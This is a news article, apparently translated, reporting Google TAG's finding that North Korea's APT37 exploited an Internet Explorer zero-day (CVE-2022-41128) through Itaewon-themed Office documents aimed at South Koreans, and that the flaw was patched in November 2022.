Google cybersecurity analysts have spotted a zero-day flaw exploited by North Korean hacker group APT37. They allegedly spied on and stole information from targets originating from South Korea.
According to the Google Threat Analysis Group (TAG), the division of Google responsible for finding security vulnerabilities in various information systems, the APT37 hackers took advantage of a zero-day vulnerability of Internet Explorer to insert malware into Office documents and target South Korean victims. The group, also known as Reaper or ScarCruft, is known to be Pyongyang’s armed wing in the cyberwar between the North Korean government and its South Korean neighbor.
To read – This malware created by North Korean hackers scans your PC to steal your data
Google would have discovered that APT37 sends infected documents malicious scripts to its targets. According to the company’s blog, these hackers are known to prey on North Korean defectors, policy makers, journalists and other South Korean activists. Google’s cybersecurity experts have been informed by various netizens that a Microsoft Office document has been in heavy circulation in the land of the Morning Calm. This one does reference to the Itaewon incidentwhich led to the death of several hundred people on October 29 in Seoul.
A flaw in Internet Explorer allowed you to download malware even if you weren’t using Microsoft’s browser
This tragedy inevitably arouses the curiosity of South Koreans, who can’t resist opening the file when they receive it in their inbox. From October 31, 2022, Internet users will receive files in RTF format. Once on their target’s computer, the latter download their content in HTML format to remote servers, and open automatically on Internet Explorer, with no possible intervention from the Internet user. The hackers then exploit a flaw in the IE JavaScript engine which allows malicious code to be executed from the site to which hackers have directed their targets.
Fortunately, this vulnerability, CVE-2022-41128, was duly patched almost ten days after it was discovered. It was, along with five other security fixes, in the November 2022 Patch Tuesday updates.
source: Bleeping Computer